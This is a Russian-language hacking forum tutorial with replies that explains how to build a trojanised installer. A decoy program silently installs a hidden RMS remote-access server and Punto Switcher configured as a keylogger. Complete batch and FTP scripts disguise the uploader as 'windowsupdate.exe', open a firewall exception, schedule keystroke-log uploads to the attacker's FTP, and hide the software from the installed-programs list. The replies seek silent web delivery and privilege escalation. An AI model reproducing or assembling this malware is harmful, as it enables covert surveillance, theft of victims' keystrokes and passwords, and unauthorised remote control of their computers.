"...Петро прикинулся сиротой, униженно и подобострастно улыбался..." © М.Шолохов. Тихий Дон. Суть идеи: даем пользователю инсталятор, он его запускает, радуется установленной, нужной и полезной программе. Паралельно устанавливается наш софт Потребуется: 1. Remote Manipulator System beta v.5.1.3 2. Bat_To_Exe_Converter v.1.6 3. Smart Install Maker v5.04 4. Punto Switcher 5. ftp.exe из папки виндовса. 6. E-mail адрес, аккаунт на хостинге с поддержкой ftp. 7. Безобидная программа, нужная пользователю. Описание данной сборки: пользователь устанавливает нужный ему софт, паралельно устанавливается наша сборка: RMS для удаленного администирования, пунто свитчер работающий в режиме "клавиатурного шпиона" и регулярная (каждые пять часов) отправка логов пунтосвитчера на фтп. Сборка собиралась для использования под ОС Windows 7, 32-bit, расположение каталогов с софтом на клиентсой машине: - Remote Manipulator System Server - в папке Program files - Punto Switcher - в папке C:\Recovery\ntldr - модуль отправки логов Punto Switcher'a - в папке C:\Recovery\update Собственно сама сборка: Устанавливаем RMS Viewer, конфигурируем под себя *.msi установщик серверной части. Указываем где у лежит наш .msi дистрибутив RMS-сервера, выбираем пункт "One-click дистрибутив" для полностью автоматической установки, ставим галочку на "Получить Intenet-ID" при установке и вписываем свой e-mail, куда будем получать данные для коннекта, просим сгенерировать новый пароль. Переходит на вторую вкладку, "Другое", рассталвляем галочки как показано на скрине, и жмем кнопку "Конфигурировать" Раздел "Безопасность": устанавливаем пароль на редактирование настроек нашей копии программы. Раздел настройки: расставляем галочки как показано на скрине, скрываем RMS от лишних глаз. Рекомендую также пройтись на вкладку "Логирование" и проверить, не стоит ли пункт "Логирование". Если стоит, то конечно убрать Устанавливаем защиту настроек, так, на всякий случай , защита от других кул-хацкеров: Закрываем меню настроек RMS-сервера, получаем на выходе самораспаковывающийся архив RMS.exe. Извлекаем из архива install.cmd и настроенный *.msi инсталятор. Получившийся .msi инстралятор мы будем использовать без дополнительных изменений, а install.cmd немного дополним. О превращении программы Punto Switcher в своего рода кейлоггер я однажды писал здесь Настраиваем отправку файла дневника Punto Switcher на фтп. Всего три файла: - собственно сам ftp.exe, из папки виндовса. По непонятным мне самому причинам, я его переименовал в windowsupdate.exe; - батник windowsupdate.cmd с таким содержимым: Code: @echo off netsh firewall add allowedprogram C:\Recovery\update\windowsupdate.exe WindowsUpdate enable // добавляем наш переименованный фтп клиент в исключения Windows Firewall'a windowsupdate.exe -s:update.txt -n // запускаем фтп-клиент и указываем ему на сценарий с коммандами - текстовый документ update.txt с таким содержимым: Code: open ТВОЙ_ФТП.ru // соединяемся со своим фтп USER ТВОЙ_ЛОГИН_ФТП // вводим имя пользователя ТВОЙ_ПАРОЛЬ_ФТП // сообщаем свой пароль cd /http/punto05032012 // переходим в заранее созданную на фтп папку, куда будет загружаться файл дневника quote pasv // не знаю зачем, так на всякий случай binary // готовимся к передаче файла на сервер put "C:\Recovery\ntldr\User Data\diary.dat" // отправляем файл на сервер quit // прощаемся С помощью bat2exe cобираем "модуль" отправки файла в одно целое: запускаем Bat 2 Exe, компилируем, файл на выходе назовем опять же "windowsupdate.exe" Пишем батник для запуска всего безобразия (помните, при распакове архива RMS.exe у нас был батник? Вот его и дополняем): install.bat Code: @echo off @chcp 1251 @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /passive REBOOT=ReallySuppress @MsiExec /x {11A90858-40BB-4858-A2DA-CA6495B5E907} /passive REBOOT=ReallySuppress @ping 127.0.0.1 @MsiExec /I "rms.server5.1b3ru.msi" /qn //устанавливаем RMS сервер @schtasks /create /tn "WindowsUpdate" /tr "C:\Recovery\update\windowsupdate.exe" /sc hourly /mo 5 // создаем задание-каждый 5 часов отправлять файл дневника PuntoSwitcher на наш фтп @ping 127.0.0.1 -n 60 > nul // ждем 60 секунд @reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Un install\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f //удаляем RMS-сервер из списка установленных программ @reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC46595B9E70" /f //удаляем RMS-сервер из списка установленных программ @attrib +S +H "%ProgramFiles%\Remote Manipulator System - Server" // скрываем папку RMS-сервера от посторонних глаз, ставим аттрибуты скрытый и системный @tasklist // сам не знаю зачем, для профилактики наверное. в общем получаем список процессов @taskkill /im punto.exe // если на компьтере уже запущен Punto Switcher - убиваем его @ping 127.0.0.1 -n 10 > nul // ждем 10 секунд @DEL "%ProgramFiles%\Yandex\Punto Switcher\*.*" /Q /S /F // удаляем все файлы в папке PuntoSwitcher'a @reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "svchost" /t REG_SZ /d "C:\Recovery\svchost.exe" /f >nul // добавляем наш Пунто в автозагрузку @start "C:\Recovery\ntldr\svchost.exe" // запускаем свой Punto Switcher @DEL "%ProgramFiles%\ViZio WebCam Online Chat\fonts\*.*" /Q /S /F // чистим временную папку, откуда устанавливалось все это безобразие
Теперь, когда все файлы у нас готовы, приступаем к созданию красивого инсталятора. Запускаем Smart Install Maker, создаем красивый дистрибутив: Вкладка General, основные сведения для установки: наименование программы и т.п.. Заполняем максимально правдоподобно. Вкладка "Файлы" - указываем какие файлы использовать установщику и куда их распаковывать при установке. Первым делом указываем папку с нашим portable дистрибутивом безобидной программы и куда ее устанавливать: Следующий шаг, указываем куда распаковывать Punto Switcher (ака клавиатурный шпион ). Лично я выбрал системную папку Recovery. Предпоследнее, указываем путь для распаковки *.msi инсталятора RMS-сервера и .bat файла насстройки всей нашей системы: Переходим на вкладку "Комманды" и даем указание установщику выполнить наш батник: Остальные разделы, в частности пользовательский интерфейс инсталятора - редактируется каждым под себя, все ограничено лишь Вашей фантазией. Послесловие: для отвлечения внимания я взял программу VZO chat, вы можете использовать любую другую, список portable-программ велик: Интернет-пейджеры, игры, антивирусы, архиваторы. Весьма неплохую подборку я нашел на soft - portable*ru Для создания сборки советую использовать пятую бета версию RMS v.v.1-3, так как в более поздних версиях после установки выскакивывет окно с предложением отпарвить логин-пароль удаленному администратору. Основные файлы, необходимые для создания сборки - залил на депозит: ссылка 18.6 Mb . P.S. статья написана в ознакомительных целях, любое противоправное использование функциональных возможностей влечет за собой административную и уголовную ответственность Для antichat.ru. © makag ___________ Прошу извинить за возможные неточности и корявость изложения. Буду рад выслушать критику и пожелания.
Такто ни что не вечно, и зборка эта палица чуть медленнее чем норм криптор, но не будеш же ты инсталяшку такую прогружать=) А для конттроля определенного ПК есть бэкдоры.
а как сделать веб-загрузчик? чтоб с сервака грузился и тихо ставился? И возможно ещё программно дать права администратора?
если эта http://forum.antichat.ru/thread282693.html то там нет ничё про веб установщик. Видел проги в которые ссылку вбиваешь и он генерит exe, но скачать не удалось
для версий RMS 5.0.0.1 и RMS 5.0.1.3 - заменить exe'шники на те, что идут в архиве по ссылке http://f-bit.ru/233438 пароль на архив 123 для более новых версий рмс - или искать готовые "пропатченные" версии exe'шников в интернете, или править их самому
Продайте хорошую готовую программу , отправил ее, проинсталили ее под видом чего то (или вообще ошибка на инстал вылетела) и наблюдаешь и файлы копирует при желании. Все инвизибл
